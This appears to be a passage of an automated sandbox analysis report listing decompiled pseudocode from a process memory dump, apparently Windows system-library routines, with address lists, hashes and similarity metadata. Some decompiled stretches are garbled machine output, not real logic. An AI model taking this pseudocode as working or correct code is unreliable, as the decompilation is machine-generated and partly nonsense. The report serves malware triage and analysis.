                                                              									L80:
                                                              									_v32 = __eax;
                                                              								}
                                                              								goto L14;
                                                              							case 8:
                                                              								__eax =  *0x10d6e58 & 0x0000ffff;
                                                              								__eax = ( *0x10d6e58 & 0x0000ffff) + 2;
                                                              								L53:
                                                              								__ebx = __ebx + __eax;
                                                              								L14:
                                                              								_t314 = _t314 + 1;
                                                              								if(_t314 >= _v48) {
                                                              									goto L16;
                                                              								} else {
                                                              									_t303 = _v37;
                                                              									goto L1;
                                                              								}
                                                              								goto L108;
                                                              						}
                                                              					}
                                                              					L56:
                                                              					_t288 = 0x25;
                                                              					asm("int 0x29");
                                                              					asm("out 0x28, al");
                                                              					 *_t288 =  *_t288 + _t237;
                                                              					asm("o16 sub [ecx], al");
                                                              					_t238 = _t237 + _t331;
                                                              					asm("daa");
                                                              					 *_t288 =  *_t288 + _t238;
                                                              					 *[es:ecx] =  *[es:ecx] + _t238;
                                                              					_t324 = _t321 + 1;
                                                              					 *_t288 =  *_t288 - _t238;
                                                              					 *0x1f010126 =  *0x1f010126 + _t238;
                                                              					_pop(_t279);
                                                              					_t239 = _t238 + 0x1289401;
                                                              					 *0x201055b =  *0x201055b + _t324;
                                                              					 *_t288 =  *_t288 - _t239;
                                                              					 *((intOrPtr*)(_t239 - 0x9fefed8)) =  *((intOrPtr*)(_t239 - 0x9fefed8)) + _t239;
                                                              					asm("daa");
                                                              					 *_t288 =  *_t288 + _t239;
                                                              					_push(ds);
                                                              					 *_t288 =  *_t288 - _t239;
                                                              					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
                                                              					 *_t288 =  *_t288 + _t239;
                                                              					asm("daa");
                                                              					 *_t288 =  *_t288 + _t239;
                                                              					asm("fcomp dword [ebx+0x5]");
                                                              					 *((intOrPtr*)(_t239 +  &_a1546911997)) =  *((intOrPtr*)(_t239 +  &_a1546911997)) + _t324;
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					_push(0x20);
                                                              					_push(0x10bff00);
                                                              					E0103D08C(_t279, _t316, _t324);
                                                              					_v44 =  *[fs:0x18];
                                                              					_t317 = 0;
                                                              					 *_a24 = 0;
                                                              					_t280 = _a12;
                                                              					__eflags = _t280;
                                                              					if(_t280 == 0) {
                                                              						_t243 = 0xc0000100;
                                                              					} else {
                                                              						_v8 = 0;
                                                              						_t325 = 0xc0000100;
                                                              						_v52 = 0xc0000100;
                                                              						_t245 = 4;
                                                              						while(1) {
                                                              							_v40 = _t245;
                                                              							__eflags = _t245;
                                                              							if(_t245 == 0) {
                                                              								break;
                                                              							}
                                                              							_t293 = _t245 * 0xc;
                                                              							_v48 = _t293;
                                                              							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0xfc1664));
                                                              							if(__eflags <= 0) {
                                                              								if(__eflags == 0) {
                                                              									_t260 = E0102E5C0(_a8,  *((intOrPtr*)(_t293 + 0xfc1668)), _t280);
                                                              									_t331 = _t331 + 0xc;
                                                              									__eflags = _t260;
                                                              									if(__eflags == 0) {
                                                              										_t325 = E010651BE(_t280,  *((intOrPtr*)(_v48 + 0xfc166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
                                                              										_v52 = _t325;
                                                              										break;
                                                              									} else {
                                                              										_t245 = _v40;
                                                              										goto L62;
                                                              									}
                                                              									goto L70;
                                                              								} else {
                                                              									L62:
                                                              									_t245 = _t245 - 1;
                                                              									continue;
                                                              								}
                                                              							}
                                                              							break;
                                                              						}
                                                              						_v32 = _t325;
                                                              						__eflags = _t325;
                                                              						if(_t325 < 0) {
                                                              							__eflags = _t325 - 0xc0000100;
                                                              							if(_t325 == 0xc0000100) {
                                                              								_t289 = _a4;
                                                              								__eflags = _t289;
                                                              								if(_t289 != 0) {
                                                              									_v36 = _t289;
                                                              									__eflags =  *_t289 - _t317;
                                                              									if( *_t289 == _t317) {
                                                              										_t325 = 0xc0000100;
                                                              										goto L76;
                                                              									} else {
                                                              										_t305 =  *((intOrPtr*)(_v44 + 0x30));
                                                              										_t247 =  *((intOrPtr*)(_t305 + 0x10));
                                                              										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
                                                              										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
                                                              											__eflags =  *(_t305 + 0x1c);
                                                              											if( *(_t305 + 0x1c) == 0) {
                                                              												L106:
                                                              												_t325 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
                                                              												_v32 = _t325;
                                                              												__eflags = _t325 - 0xc0000100;
                                                              												if(_t325 != 0xc0000100) {
                                                              													goto L69;
                                                              												} else {
                                                              													_t317 = 1;
                                                              													_t289 = _v36;
                                                              													goto L75;
                                                              												}
                                                              											} else {
                                                              												_t250 = E00FF6600( *(_t305 + 0x1c));
                                                              												__eflags = _t250;
                                                              												if(_t250 != 0) {
                                                              													goto L106;
                                                              												} else {
                                                              													_t289 = _a4;
                                                              													goto L75;
                                                              												}
                                                              											}
                                                              										} else {
                                                              											L75:
                                                              											_t325 = E01012C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
                                                              											L76:
                                                              											_v32 = _t325;
                                                              											goto L69;
                                                              										}
                                                              									}
                                                              									goto L108;
                                                              								} else {
                                                              									E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                              									_v8 = 1;
                                                              									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                              									_t325 = _a24;
                                                              									_t257 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
                                                              									_v32 = _t257;
                                                              									__eflags = _t257 - 0xc0000100;
                                                              									if(_t257 == 0xc0000100) {
                                                              										_v32 = E01012C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
                                                              									}
                                                              									_v8 = _t317;
                                                              									E01012ACB();
                                                              								}
                                                              							}
                                                              						}
                                                              						L69:
                                                              						_v8 = 0xfffffffe;
                                                              						_t243 = _t325;
                                                              					}
                                                              					L70:
                                                              					return E0103D0D1(_t243);
                                                              				}
                                                              				L108:
                                                              			}

                                                              0x00000000
                                                              0x00000000
                                                              0x01012894
                                                              0x0101289b
                                                              0x0101289d
                                                              0x010128a1
                                                              0x01055b2b
                                                              0x01055b2e
                                                              0x01055b2e
                                                              0x010128a7
                                                              0x010128a9
                                                              0x01055b04
                                                              0x01055b09
                                                              0x01055b09
                                                              0x01055b09
                                                              0x00000000
                                                              0x00000000
                                                              0x01055b35
                                                              0x01055b3c
                                                              0x010128fb
                                                              0x010128fb
                                                              0x010126cc
                                                              0x010126cc
                                                              0x010126d0
                                                              0x00000000
                                                              0x010126d2
                                                              0x010126d2
                                                              0x00000000
                                                              0x010126d2
                                                              0x00000000
                                                              0x00000000
                                                              0x010125fe
                                                              0x0101292d
                                                              0x0101292f
                                                              0x01012930
                                                              0x01012935
                                                              0x01012937
                                                              0x01012939
                                                              0x0101293c
                                                              0x0101293e
                                                              0x0101293f
                                                              0x01012941
                                                              0x01012945
                                                              0x01012946
                                                              0x01012948
                                                              0x0101294e
                                                              0x0101294f
                                                              0x01012954
                                                              0x0101295a
                                                              0x0101295c
                                                              0x01012962
                                                              0x01012963
                                                              0x01012965
                                                              0x01012966
                                                              0x01012968
                                                              0x0101296b
                                                              0x0101296e
                                                              0x0101296f
                                                              0x01012971
                                                              0x01012974
                                                              0x01012980
                                                              0x01012981
                                                              0x01012982
                                                              0x01012983
                                                              0x01012984
                                                              0x01012985
                                                              0x01012986
                                                              0x01012987
                                                              0x01012988
                                                              0x01012989
                                                              0x0101298a
                                                              0x0101298b
                                                              0x0101298c
                                                              0x0101298d
                                                              0x0101298e
                                                              0x0101298f
                                                              0x01012990
                                                              0x01012992
                                                              0x01012997
                                                              0x010129a3
                                                              0x010129a6
                                                              0x010129ab
                                                              0x010129ad
                                                              0x010129b0
                                                              0x010129b2
                                                              0x01055c80
                                                              0x010129b8
                                                              0x010129b8
                                                              0x010129bb
                                                              0x010129c0
                                                              0x010129c5
                                                              0x010129c6
                                                              0x010129c6
                                                              0x010129c9
                                                              0x010129cb
                                                              0x00000000
                                                              0x00000000
                                                              0x010129cd
                                                              0x010129d0
                                                              0x010129d9
                                                              0x010129db
                                                              0x010129dd
                                                              0x01012a7f
                                                              0x01012a84
                                                              0x01012a87
                                                              0x01012a89
                                                              0x01055ca1
                                                              0x01055ca3
                                                              0x00000000
                                                              0x01012a8f
                                                              0x01012a8f
                                                              0x00000000
                                                              0x01012a8f
                                                              0x00000000
                                                              0x010129e3
                                                              0x010129e3
                                                              0x010129e3
                                                              0x00000000
                                                              0x010129e3
                                                              0x010129dd
                                                              0x00000000
                                                              0x010129db
                                                              0x010129e6
                                                              0x010129e9
                                                              0x010129eb
                                                              0x010129ed
                                                              0x010129f3
                                                              0x010129f5
                                                              0x010129f8
                                                              0x010129fa
                                                              0x01012a97
                                                              0x01012a9a
                                                              0x01012a9d
                                                              0x01012add
                                                              0x00000000
                                                              0x01012a9f
                                                              0x01012aa2
                                                              0x01012aa5
                                                              0x01012aa8
                                                              0x01012aab
                                                              0x01055cab
                                                              0x01055caf
                                                              0x01055cc5
                                                              0x01055cda
                                                              0x01055cdc
                                                              0x01055cdf
                                                              0x01055ce5
                                                              0x00000000
                                                              0x01055ceb
                                                              0x01055ced
                                                              0x01055cee
                                                              0x00000000
                                                              0x01055cee
                                                              0x01055cb1
                                                              0x01055cb4
                                                              0x01055cb9
                                                              0x01055cbb
                                                              0x00000000
                                                              0x01055cbd
                                                              0x01055cbd
                                                              0x00000000
                                                              0x01055cbd
                                                              0x01055cbb
                                                              0x01012ab1
                                                              0x01012ab1
                                                              0x01012ac4
                                                              0x01012ac6
                                                              0x01012ac6
                                                              0x00000000
                                                              0x01012ac6
                                                              0x01012aab
                                                              0x00000000
                                                              0x01012a00
                                                              0x01012a09
                                                              0x01012a0e
                                                              0x01012a21
                                                              0x01012a24
                                                              0x01012a35
                                                              0x01012a3a
                                                              0x01012a3d
                                                              0x01012a42
                                                              0x01012a59
                                                              0x01012a59
                                                              0x01012a5c
                                                              0x01012a5f
                                                              0x01012a5f
                                                              0x010129fa
                                                              0x010129f3
                                                              0x01012a64
                                                              0x01012a64
                                                              0x01012a6b
                                                              0x01012a6b
                                                              0x01012a6d
                                                              0x01012a72
                                                              0x01012a72
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PATH
                                                              • API String ID: 0-1036084923
                                                              • Opcode ID: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                                                              • Instruction ID: cca27a16bf92238830b7feba0443c06178e5c8320f1ecf613b25f0b1912722cc
                                                              • Opcode Fuzzy Hash: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                                                              • Instruction Fuzzy Hash: F6C18071D00219DFDB25DF99D881BEEBBF1FF48750F248069E981AB294D738A941CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E0101FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                              				char _v5;
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				char _v16;
                                                              				char _v17;
                                                              				char _v20;
                                                              				signed int _v24;
                                                              				char _v28;
                                                              				char _v32;
                                                              				signed int _v40;
                                                              				void* __ecx;
                                                              				void* __edi;
                                                              				void* __ebp;
                                                              				signed int _t73;
                                                              				intOrPtr* _t75;
                                                              				signed int _t77;
                                                              				signed int _t79;
                                                              				signed int _t81;
                                                              				intOrPtr _t83;
                                                              				intOrPtr _t85;
                                                              				intOrPtr _t86;
                                                              				signed int _t91;
                                                              				signed int _t94;
                                                              				signed int _t95;
                                                              				signed int _t96;
                                                              				signed int _t106;
                                                              				signed int _t108;
                                                              				signed int _t114;
                                                              				signed int _t116;
                                                              				signed int _t118;
                                                              				signed int _t122;
                                                              				signed int _t123;
                                                              				void* _t129;
                                                              				signed int _t130;
                                                              				void* _t132;
                                                              				intOrPtr* _t134;
                                                              				signed int _t138;
                                                              				signed int _t141;
                                                              				signed int _t147;
                                                              				intOrPtr _t153;
                                                              				signed int _t154;
                                                              				signed int _t155;
                                                              				signed int _t170;
                                                              				void* _t174;
                                                              				signed int _t176;
                                                              				signed int _t177;
                                                              
                                                              				_t129 = __ebx;
                                                              				_push(_t132);
                                                              				_push(__esi);
                                                              				_t174 = _t132;
                                                              				_t73 =  !( *( *(_t174 + 0x18)));
                                                              				if(_t73 >= 0) {
                                                              					L5:
                                                              					return _t73;
                                                              				} else {
                                                              					E00FFEEF0(0x10d7b60);
                                                              					_t134 =  *0x10d7b84; // 0x77f07b80
                                                              					_t2 = _t174 + 0x24; // 0x24
                                                              					_t75 = _t2;
                                                              					if( *_t134 != 0x10d7b80) {
                                                              						_push(3);
                                                              						asm("int 0x29");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						_push(0x10d7b60);
                                                              						_t170 = _v8;
                                                              						_v28 = 0;
                                                              						_v40 = 0;
                                                              						_v24 = 0;
                                                              						_v17 = 0;
                                                              						_v32 = 0;
                                                              						__eflags = _t170 & 0xffff7cf2;
                                                              						if((_t170 & 0xffff7cf2) != 0) {
                                                              							L43:
                                                              							_t77 = 0xc000000d;
                                                              						} else {
                                                              							_t79 = _t170 & 0x0000000c;
                                                              							__eflags = _t79;
                                                              							if(_t79 != 0) {
                                                              								__eflags = _t79 - 0xc;
                                                              								if(_t79 == 0xc) {
                                                              									goto L43;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							} else {
                                                              								_t170 = _t170 | 0x00000008;
                                                              								__eflags = _t170;
                                                              								L9:
                                                              								_t81 = _t170 & 0x00000300;
                                                              								__eflags = _t81 - 0x300;
                                                              								if(_t81 == 0x300) {
                                                              									goto L43;
                                                              								} else {
                                                              									_t138 = _t170 & 0x00000001;
                                                              									__eflags = _t138;
                                                              									_v24 = _t138;
                                                              									if(_t138 != 0) {
                                                              										__eflags = _t81;
                                                              										if(_t81 != 0) {
                                                              											goto L43;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									} else {
                                                              										L11:
                                                              										_push(_t129);
                                                              										_t77 = E00FF6D90( &_v20);
                                                              										_t130 = _t77;
                                                              										__eflags = _t130;
                                                              										if(_t130 >= 0) {
                                                              											_push(_t174);
                                                              											__eflags = _t170 & 0x00000301;
                                                              											if((_t170 & 0x00000301) == 0) {
                                                              												_t176 = _a8;
                                                              												__eflags = _t176;
                                                              												if(__eflags == 0) {
                                                              													L64:
                                                              													_t83 =  *[fs:0x18];
                                                              													_t177 = 0;
                                                              													__eflags =  *(_t83 + 0xfb8);
                                                              													if( *(_t83 + 0xfb8) != 0) {
                                                              														E00FF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                              													}
                                                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                              													goto L15;
                                                              												} else {
                                                              													asm("sbb edx, edx");
                                                              													_t114 = E01088938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                              													__eflags = _t114;
                                                              													if(_t114 < 0) {
                                                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                              														E00FEB150();
                                                              													}
                                                              													_t116 = E01086D81(_t176,  &_v16);
                                                              													__eflags = _t116;
                                                              													if(_t116 >= 0) {
                                                              														__eflags = _v16 - 2;
                                                              														if(_v16 < 2) {
                                                              															L56:
                                                              															_t118 = E00FF75CE(_v20, 5, 0);
                                                              															__eflags = _t118;
                                                              															if(_t118 < 0) {
                                                              																L67:
                                                              																_t130 = 0xc0000017;
                                                              																goto L32;
                                                              															} else {
                                                              																__eflags = _v12;
                                                              																if(_v12 == 0) {
                                                              																	goto L67;
                                                              																} else {
                                                              																	_t153 =  *0x10d8638; // 0x0
                                                              																	_t122 = L00FF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                              																	_t154 = _v12;
                                                              																	_t130 = _t122;
                                                              																	__eflags = _t130;
                                                              																	if(_t130 >= 0) {
                                                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                              																		__eflags = _t123;
                                                              																		if(_t123 != 0) {
                                                              																			_t155 = _a12;
                                                              																			__eflags = _t155;
                                                              																			if(_t155 != 0) {
                                                              																				 *_t155 = _t123;
                                                              																			}
                                                              																			goto L64;
                                                              																		} else {
                                                              																			E00FF76E2(_t154);
                                                              																			goto L41;
                                                              																		}
                                                              																	} else {
                                                              																		E00FF76E2(_t154);
                                                              																		_t177 = 0;
                                                              																		goto L18;
                                                              																	}
                                                              																}
                                                              															}
                                                              														} else {
                                                              															__eflags =  *_t176;
                                                              															if( *_t176 != 0) {
                                                              																goto L56;
                                                              															} else {
                                                              																__eflags =  *(_t176 + 2);
                                                              																if( *(_t176 + 2) == 0) {
                                                              																	goto L64;
                                                              																} else {
                                                              																	goto L56;
                                                              																}
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t130 = 0xc000000d;
                                                              														goto L32;
                                                              													}
                                                              												}
                                                              												goto L35;
                                                              											} else {
                                                              												__eflags = _a8;
                                                              												if(_a8 != 0) {
                                                              													_t77 = 0xc000000d;
                                                              												} else {
                                                              													_v5 = 1;
                                                              													L0101FCE3(_v20, _t170);
                                                              													_t177 = 0;
                                                              													__eflags = 0;
                                                              													L15:
                                                              													_t85 =  *[fs:0x18];
                                                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                              														L18:
                                                              														__eflags = _t130;
                                                              														if(_t130 != 0) {
                                                              															goto L32;
                                                              														} else {
                                                              															__eflags = _v5 - _t130;
                                                              															if(_v5 == _t130) {
                                                              																goto L32;
                                                              															} else {
                                                              																_t86 =  *[fs:0x18];
                                                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                              																}
                                                              																__eflags = _t177;
                                                              																if(_t177 == 0) {
                                                              																	L31:
                                                              																	__eflags = 0;
                                                              																	L00FF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                              																	goto L32;
                                                              																} else {
                                                              																	__eflags = _v24;
                                                              																	_t91 =  *(_t177 + 0x20);
                                                              																	if(_v24 != 0) {
                                                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                              																		goto L31;
                                                              																	} else {
                                                              																		_t141 = _t91 & 0x00000040;
                                                              																		__eflags = _t170 & 0x00000100;
                                                              																		if((_t170 & 0x00000100) == 0) {
                                                              																			__eflags = _t141;
                                                              																			if(_t141 == 0) {
                                                              																				L74:
                                                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                              																				goto L27;
                                                              																			} else {
                                                              																				_t177 = E0101FD22(_t177);
                                                              																				__eflags = _t177;
                                                              																				if(_t177 == 0) {
                                                              																					goto L42;
                                                              																				} else {
                                                              																					_t130 = E0101FD9B(_t177, 0, 4);
                                                              																					__eflags = _t130;
                                                              																					if(_t130 != 0) {
                                                              																						goto L42;
                                                              																					} else {
                                                              																						_t68 = _t177 + 0x20;
                                                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                              																						__eflags =  *_t68;
                                                              																						_t91 =  *(_t177 + 0x20);
                                                              																						goto L74;
                                                              																					}
                                                              																				}
                                                              																			}
                                                              																			goto L35;
                                                              																		} else {
                                                              																			__eflags = _t141;
                                                              																			if(_t141 != 0) {
                                                              																				_t177 = E0101FD22(_t177);
                                                              																				__eflags = _t177;
                                                              																				if(_t177 == 0) {
                                                              																					L42:
                                                              																					_t77 = 0xc0000001;
                                                              																					goto L33;
                                                              																				} else {
                                                              																					_t130 = E0101FD9B(_t177, 0, 4);
                                                              																					__eflags = _t130;
                                                              																					if(_t130 != 0) {
                                                              																						goto L42;
                                                              																					} else {
                                                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                              																						_t91 =  *(_t177 + 0x20);
                                                              																						goto L26;
                                                              																					}
                                                              																				}
                                                              																				goto L35;
                                                              																			} else {
                                                              																				L26:
                                                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                              																				__eflags = _t94;
                                                              																				L27:
                                                              																				 *(_t177 + 0x20) = _t94;
                                                              																				__eflags = _t170 & 0x00008000;
                                                              																				if((_t170 & 0x00008000) != 0) {
                                                              																					_t95 = _a12;
                                                              																					__eflags = _t95;
                                                              																					if(_t95 != 0) {
                                                              																						_t96 =  *_t95;
                                                              																						__eflags = _t96;
                                                              																						if(_t96 != 0) {
                                                              																							 *((short*)(_t177 + 0x22)) = 0;
                                                              																							_t40 = _t177 + 0x20;
                                                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                              																							__eflags =  *_t40;
                                                              																						}
                                                              																					}
                                                              																				}
                                                              																				goto L31;
                                                              																			}
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                              														_t106 =  *(_t147 + 0x20);
                                                              														__eflags = _t106 & 0x00000040;
                                                              														if((_t106 & 0x00000040) != 0) {
                                                              															_t147 = E0101FD22(_t147);
                                                              															__eflags = _t147;
                                                              															if(_t147 == 0) {
                                                              																L41:
                                                              																_t130 = 0xc0000001;
                                                              																L32:
                                                              																_t77 = _t130;
                                                              																goto L33;
                                                              															} else {
                                                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                              																_t106 =  *(_t147 + 0x20);
                                                              																goto L17;
                                                              															}
                                                              															goto L35;
                                                              														} else {
                                                              															L17:
                                                              															_t108 = _t106 | 0x00000080;
                                                              															__eflags = _t108;
                                                              															 *(_t147 + 0x20) = _t108;
                                                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                              															goto L18;
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											L33:
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						L35:
                                                              						return _t77;
                                                              					} else {
                                                              						 *_t75 = 0x10d7b80;
                                                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                              						 *_t134 = _t75;
                                                              						 *0x10d7b84 = _t75;
                                                              						_t73 = E00FFEB70(_t134, 0x10d7b60);
                                                              						if( *0x10d7b20 != 0) {
                                                              							_t73 =  *( *[fs:0x30] + 0xc);
                                                              							if( *((char*)(_t73 + 0x28)) == 0) {
                                                              								_t73 = E00FFFF60( *0x10d7b20);
                                                              							}
                                                              						}
                                                              						goto L5;
                                                              					}
                                                              				}
                                                              			}

















































                                                              0x0101fbbf
                                                              0x0101fbc5
                                                              0x0101fbcb
                                                              0x0101fbf8
                                                              0x0101fbf8
                                                              0x0101fbfa
                                                              0x00000000
                                                              0x0101fc00
                                                              0x0101fc00
                                                              0x0101fc03
                                                              0x00000000
                                                              0x0101fc09
                                                              0x0101fc09
                                                              0x0101fc0f
                                                              0x0101fc15
                                                              0x0101fc23
                                                              0x0101fc23
                                                              0x0101fc25
                                                              0x0101fc27
                                                              0x0101fc75
                                                              0x0101fc7c
                                                              0x0101fc84
                                                              0x00000000
                                                              0x0101fc29
                                                              0x0101fc29
                                                              0x0101fc2d
                                                              0x0101fc30
                                                              0x0105bf0f
                                                              0x00000000
                                                              0x0101fc36
                                                              0x0101fc38
                                                              0x0101fc3b
                                                              0x0101fc41
                                                              0x0105bf17
                                                              0x0105bf19
                                                              0x0105bf48
                                                              0x0105bf4b
                                                              0x00000000
                                                              0x0105bf1b
                                                              0x0105bf22
                                                              0x0105bf24
                                                              0x0105bf26
                                                              0x00000000
                                                              0x0105bf2c
                                                              0x0105bf37
                                                              0x0105bf39
                                                              0x0105bf3b
                                                              0x00000000
                                                              0x0105bf41
                                                              0x0105bf41
                                                              0x0105bf41
                                                              0x0105bf41
                                                              0x0105bf45
                                                              0x00000000
                                                              0x0105bf45
                                                              0x0105bf3b
                                                              0x0105bf26
                                                              0x00000000
                                                              0x0101fc47
                                                              0x0101fc47
                                                              0x0101fc49
                                                              0x0101fcb2
                                                              0x0101fcb4
                                                              0x0101fcb6
                                                              0x0101fcdc
                                                              0x0101fcdc
                                                              0x00000000
                                                              0x0101fcb8
                                                              0x0101fcc3
                                                              0x0101fcc5
                                                              0x0101fcc7
                                                              0x00000000
                                                              0x0101fcc9
                                                              0x0101fcc9
                                                              0x0101fccd
                                                              0x00000000
                                                              0x0101fccd
                                                              0x0101fcc7
                                                              0x00000000
                                                              0x0101fc4b
                                                              0x0101fc4b
                                                              0x0101fc4e
                                                              0x0101fc4e
                                                              0x0101fc51
                                                              0x0101fc51
                                                              0x0101fc54
                                                              0x0101fc5a
                                                              0x0101fc5c
                                                              0x0101fc5f
                                                              0x0101fc61
                                                              0x0101fc63
                                                              0x0101fc65
                                                              0x0101fc67
                                                              0x0101fc6e
                                                              0x0101fc72
                                                              0x0101fc72
                                                              0x0101fc72
                                                              0x0101fc72
                                                              0x0101fc67
                                                              0x0101fc61
                                                              0x00000000
                                                              0x0101fc5a
                                                              0x0101fc49
                                                              0x0101fc41
                                                              0x0101fc30
                                                              0x0101fc27
                                                              0x0101fc03
                                                              0x0101fbcd
                                                              0x0101fbd3
                                                              0x0101fbd9
                                                              0x0101fbdc
                                                              0x0101fbde
                                                              0x0101fc99
                                                              0x0101fc9b
                                                              0x0101fc9d
                                                              0x0101fcd5
                                                              0x0101fcd5
                                                              0x0101fc89
                                                              0x0101fc89
                                                              0x00000000
                                                              0x0101fc9f
                                                              0x0101fc9f
                                                              0x0101fca3
                                                              0x00000000
                                                              0x0101fca3
                                                              0x00000000
                                                              0x0101fbe4
                                                              0x0101fbe4
                                                              0x0101fbe4
                                                              0x0101fbe4
                                                              0x0101fbe9
                                                              0x0101fbf2
                                                              0x00000000
                                                              0x0101fbf2
                                                              0x0101fbde
                                                              0x0101fbcb
                                                              0x0101fbab
                                                              0x0101fc8b
                                                              0x0101fc8b
                                                              0x0101fc8c
                                                              0x0101fb80
                                                              0x0101fb72
                                                              0x0101fb5e
                                                              0x0101fc8d
                                                              0x0101fc91
                                                              0x0101fadf
                                                              0x0101fadf
                                                              0x0101fae1
                                                              0x0101fae4
                                                              0x0101fae7
                                                              0x0101faec
                                                              0x0101faf8
                                                              0x0101fb00
                                                              0x0101fb07
                                                              0x0101fb0f
                                                              0x0101fb0f
                                                              0x0101fb07
                                                              0x00000000
                                                              0x0101faf8
                                                              0x0101fadd

                                                              Strings
                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0105BE0F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                              • API String ID: 0-865735534
                                                              • Opcode ID: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                                                              • Instruction ID: e8382970fc5a2d65bfd155e3eb680463d8e8f5685f145ddc1b5ef14940604bb8
                                                              • Opcode Fuzzy Hash: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                                                              • Instruction Fuzzy Hash: 77A1F431B0060A8BEB61DB68C4507BEB7E5BF44714F0445A9EE82CB695DB38E805DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 63%
                                                              			E00FE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                              				signed char _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v52;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t55;
                                                              				signed int _t57;
                                                              				signed int _t58;
                                                              				char* _t62;
                                                              				signed char* _t63;
                                                              				signed char* _t64;
                                                              				signed int _t67;
                                                              				signed int _t72;
                                                              				signed int _t77;
                                                              				signed int _t78;
                                                              				signed int _t88;
                                                              				intOrPtr _t89;
                                                              				signed char _t93;
                                                              				signed int _t97;
                                                              				signed int _t98;
                                                              				signed int _t102;
                                                              				signed int _t103;
                                                              				intOrPtr _t104;
                                                              				signed int _t105;
                                                              				signed int _t106;
                                                              				signed char _t109;
                                                              				signed int _t111;
                                                              				void* _t116;
